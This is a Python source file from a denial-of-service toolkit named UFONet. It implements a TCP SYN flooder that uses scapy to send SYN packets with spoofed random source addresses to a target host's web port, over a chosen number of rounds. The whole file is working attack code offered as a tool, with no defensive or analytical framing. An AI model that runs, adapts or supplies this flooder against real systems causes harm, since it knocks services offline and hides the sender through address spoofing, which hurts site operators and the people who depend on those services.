#!/usr/bin/env python # -*- coding: utf-8 -*-" """ UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net) You should have received a copy of the GNU General Public License along with UFONet; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import random, socket, os, sys from scapy.all import * # UFONet TCP SYN Flooder (UFOSYN) def randIP(): ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) return ip def randInt(): x = random.randint(1,65535) # TCP ports return x def synize(ip, port, rounds): n=0 for x in range (0,int(rounds)): n=n+1 sport = randInt() seq = randInt() window = randInt() IP_p = IP() IP_p.src = randIP() try: IP_p.dst = ip except: print "[Error] UFOSYN: Failed to engage with 'quantum hook' ["+str(n)+"]" break TCP_l = TCP() TCP_l.sport = sport TCP_l.dport = port TCP_l.flags = "S" TCP_l.seq = seq TCP_l.window = window try: send(IP_p/TCP_l, verbose=0) print "[Info] UFOSYN: Firing 'quantum hook' ["+str(n)+"] -> Status: FLOODING!" except: print "[Error] UFOSYN: Failed to engage with 'quantum hook' ["+str(n)+"]" class UFOSYN(object): def attacking(self, target, rounds): print "[Info] TCP SYN Flooder (UFOSYN) is ready to fire: [" , rounds, "quantum hooks ]\n" if target.startswith('http://'): target = target.replace('http://','') port = 80 elif target.startswith('https://'): target = target.replace('https://','') port = 443 try: ip = socket.gethostbyname(target) except: ip = target synize(ip, port, rounds) # attack with UFOSYN using threading